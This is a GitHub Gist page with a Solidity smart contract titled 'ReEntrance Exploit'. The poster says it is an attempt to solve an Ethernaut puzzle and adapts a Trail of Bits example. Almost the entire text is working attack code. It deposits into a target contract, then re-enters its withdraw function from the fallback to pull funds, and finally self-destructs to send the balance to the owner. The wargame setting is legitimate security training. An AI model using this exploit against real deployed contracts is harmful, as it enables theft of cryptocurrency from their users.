Created
January 5, 2018 07:46
-
-
Save phillipgibb/8649975c35fbfaa9d27fe9ab06890378 to your computer and use it in GitHub Desktop.
ReEntrance Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pragma solidity ^0.4.15; | |
contract ReentranceExploit { | |
bool public attackModeIsOn=false; | |
address public vulnerable_contract; | |
address public owner; | |
uint public withdrawValue; | |
function ReentranceExploit() public{ | |
owner = msg.sender; | |
} | |
function deposit(address _vulnerable_contract) public payable{ | |
vulnerable_contract = _vulnerable_contract; | |
withdrawValue = msg.value; | |
// call addToBalance with msg.value ethers | |
require(vulnerable_contract.call.value(withdrawValue)(bytes4(keccak256("donate(address)")),owner)); | |
} | |
function launch_attack() public{ | |
attackModeIsOn = true; | |
// call withdrawBalance | |
// withdrawBalance calls the fallback of ReentranceExploit | |
require(vulnerable_contract.call(bytes4(keccak256("withdraw(uint)")),withdrawValue)); | |
} | |
function () public payable{ | |
// atackModeIsOn is used to execute the attack only once | |
// otherwise there is a loop between withdrawBalance and the fallback function | |
if (attackModeIsOn){ | |
attackModeIsOn = false; | |
require(vulnerable_contract.call(bytes4(keccak256("withdraw(uint)")),withdrawValue)); | |
} | |
} | |
function get_money(){ | |
suicide(owner); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This is an attempt to solve the Ethernaut puzzle : https://ethernaut.zeppelin.solutions/level/0xf70706db003e94cfe4b5e27ffd891d5c81b39488
It is based on https://github.com/trailofbits/not-so-smart-contracts/blob/master/reentrancy/ReentrancyExploit.sol but using the correct function methodIds:
On a different account than where I deployed the puzzle instance: